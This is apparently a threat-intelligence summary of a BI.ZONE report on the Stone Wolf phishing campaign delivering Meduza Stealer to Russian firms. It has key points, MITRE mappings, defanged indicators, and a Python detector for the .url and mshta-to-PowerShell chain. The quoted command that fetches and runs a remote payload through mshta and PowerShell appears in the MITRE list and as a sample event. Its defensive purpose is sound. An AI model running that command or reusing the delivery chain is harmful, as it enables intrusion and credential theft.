Stone Wolf Utilizes Meduza Stealer to Breach Russian Corporations

The Stone Wolf operation distributes an archive named Dostavka_Promautomatic.zip that pairs a decoy document with a malicious .url file. Opening that file leads to a Windows shortcut whose command fetches an HTA file and runs it through MSHTA and PowerShell; the resulting loader (In2al5d P3in4er) downloads and executes Meduza Stealer. The stealer gathers credentials and system data and exfiltrates them to a control server over TCP. #StoneWolf #MeduzaStealer #Dostavka_Promautomatic.zip #In2al5dP3in4er #MSHTA

Keypoints

  • The adversaries distribute a malicious archive named Dostavka_Promautomatic.zip.
  • The archive contains a legitimate .docx document used as a decoy and a malicious .url file (Scan_127-05_24_dostavka_13.05.2024.pdf.url) that starts the chain leading to Meduza Stealer.
  • Opening the .url file runs a command that downloads and executes a Windows shortcut.
  • The shortcut's command downloads an HTA file (served under an .exe name) and executes it with MSHTA, passing the embedded script to the PowerShell interpreter.
  • The decrypted PowerShell script downloads additional files and replaces the original .url file.
  • In2al5d P3in4er is used to download and run Meduza Stealer, a malware-as-a-service sold by subscription.
  • Meduza Stealer collects credentials, system information and other sensitive data, then exfiltrates it to a control server over TCP.
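The chain in these key points (and the mshta command quoted in the MITRE list) lends itself to two triage checks: a .url attachment that hides behind a document extension and points off-host, and a process-creation record in which mshta loads a remote object and pipes into `powershell -`. The Python below is an added example written for this page, not code from the BI.ZONE report or from the Stone Wolf tooling. The .url body, its TEST-NET target, the event field names and the assumption that the quoted command ran under cmd.exe are constructed for the example; only the file names, URL and IP come from the page.

```python
"""Triage helpers for the delivery chain summarised above: a .url file with a
document-looking double extension that leads to a shortcut, which runs mshta
against a remote URL and pipes the result into 'powershell -'.

Added example, not code from the BI.ZONE report or from the Stone Wolf tooling.
The .url body, the TEST-NET target it points to and the process events are
constructed for this example; only the file names, URL and IP come from the page.
"""
import re
from configparser import ConfigParser, Error as ConfigError
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Extensions an attacker puts in front of ".url" so the name reads as a document.
DOCUMENT_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt")
# Targets that should never sit behind an "Internet shortcut" in a mail attachment.
EXECUTABLE_TARGET_EXTENSIONS = (".lnk", ".hta", ".exe", ".js", ".vbs", ".ps1")

# mshta followed (within the same command, before any pipe) by an http(s) URL.
MSHTA_REMOTE = re.compile(r"\bmshta(?:\.exe)?\b[^|]*?\bhttps?://([^\s\"']+)", re.I)
# Output piped into PowerShell reading its script from stdin ("powershell -").
POWERSHELL_STDIN = re.compile(r"\|\s*powershell(?:\.exe)?\s+-\s*$", re.I)


def parse_internet_shortcut(text: str) -> Optional[str]:
    """Return the URL= target of a Windows .url (InternetShortcut) file, or None."""
    parser = ConfigParser(interpolation=None)
    try:
        parser.read_string(text)
    except ConfigError:
        return None
    return parser.get("InternetShortcut", "URL", fallback=None)


def url_file_findings(name: str, content: str) -> List[str]:
    """Flag a .url file that masquerades as a document and/or points off-host."""
    findings: List[str] = []
    lower = name.lower()
    if not lower.endswith(".url"):
        return findings
    stem = lower[: -len(".url")]
    if stem.endswith(DOCUMENT_EXTENSIONS):
        findings.append("double extension: document name carrying a .url suffix")
    target = parse_internet_shortcut(content)
    if target is None:
        return findings
    parsed = urlparse(target)
    if parsed.scheme in ("http", "https"):
        findings.append(f"remote HTTP target: {target}")
    elif (parsed.scheme == "file" and parsed.netloc) or target.startswith("\\\\"):
        findings.append(f"remote file/UNC target: {target}")
    if target.lower().endswith(EXECUTABLE_TARGET_EXTENSIONS):
        findings.append("target is a shortcut or script, not a web page")
    return findings


def process_findings(event: Dict[str, str]) -> List[str]:
    """Flag the mshta-to-PowerShell step in a process-creation record.

    ``event`` mimics a Sysmon event ID 1 / Security 4688 record with the keys
    image, parent_image and cmdline (the key names are this example's choice).
    """
    findings: List[str] = []
    cmdline = event.get("cmdline", "")
    match = MSHTA_REMOTE.search(cmdline)
    if not match:
        return findings
    url = match.group(1)
    findings.append(f"mshta loading a remote object: {url}")
    # An HTA should end in .hta; Stone Wolf served it under an .exe name.
    if not url.lower().endswith(".hta"):
        findings.append("remote object extension does not match an HTA")
    if POWERSHELL_STDIN.search(cmdline):
        findings.append("mshta output piped into 'powershell -' (script via stdin)")
    return findings


# Constructed sample inputs. The file name mirrors the page; the body and the
# TEST-NET (203.0.113.0/24) target are made up for the example.
SAMPLE_URL_NAME = "Scan_127-05_24_dostavka_13.05.2024.pdf.url"
SAMPLE_URL_BODY = "[InternetShortcut]\nURL=file://203.0.113.10@8080/share/Scan.lnk\n"

# Constructed process-creation events. The first cmdline is the command quoted
# in the report (defanged); running it under cmd.exe is this example's assumption.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "mshta http://193.124.33[.]71:3217/Scan_127-05_24_dostavka_13.05.2024.exe | powershell -"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},  # benign local HTA
]


if __name__ == "__main__":
    for finding in url_file_findings(SAMPLE_URL_NAME, SAMPLE_URL_BODY):
        print(f"[url]  {SAMPLE_URL_NAME}: {finding}")
    for event in SAMPLE_EVENTS:
        for finding in process_findings(event):
            print(f"[proc] {event['image']}: {finding}")
```

Point the first function at the members of a suspicious archive (a .url file is plain text, so the body can be read straight out of the zip) and the second at process-creation telemetry; any mshta invocation with an http(s) URL is worth a look on its own, and the stdin-pipe and extension-mismatch findings raise the priority.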

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – “The archive contains a .docx legitimate document used as a decoy.”
  • [T1059.001] Command and Scripting Interpreter: PowerShell – “the command through the PowerShell interpreter.”
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – “Windows Script Host: Use of VBScript to execute commands.”
  • [T1218.005] System Binary Proxy Execution: Mshta – “mshta http://193.124.33[.]71:3217/Scan_127-05_24_dostavka_13.05.2024.exe | powershell -“.
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – “Modifying the startup behavior of applications.”
  • [T1555] Credentials from Password Stores (a closer fit than T1003 OS Credential Dumping, which covers LSASS/SAM dumping rather than reading saved credentials) – “The stealer retrieves data … account credentials saved in Outlook” and “Windows Credential Manager and Windows Vault data…”
  • [T1041] Exfiltration Over C2 Channel – “The collected data is sent to the control server via TCP.”

Indicators of Compromise

  • [File name] Dostavka_Promautomatic.zip – archive containing the decoy .docx and the malicious .url file
  • [File name] Scan_127-05_24_dostavka_13.05.2024.pdf.url – Internet shortcut with a double extension; opening it starts the chain that ends in Meduza Stealer
  • [File name] Scan_127-05_24_dostavka_13.05.2024.exe – HTA payload (despite the .exe extension) fetched and executed through mshta
  • [URL] http://193.124.33[.]71:3217/Scan_127-05_24_dostavka_13.05.2024.exe – remote payload location
  • [URL] http://193.124.33[.]71:3217/Scan_127-05_24_dostavka_13.05.2024.pdf – PDF downloaded by the script
  • [Domain] api.ipify[.]org – legitimate public-IP lookup service queried by the malware; not malicious on its own, treat as supporting context rather than a blocking indicator
  • [IP] 193.124.33[.]71 – payload server address

Read more: https://bi.zone/eng/expertise/blog/stone-wolf-atakuet-rossiyskie-kompanii-stilerom-meduza/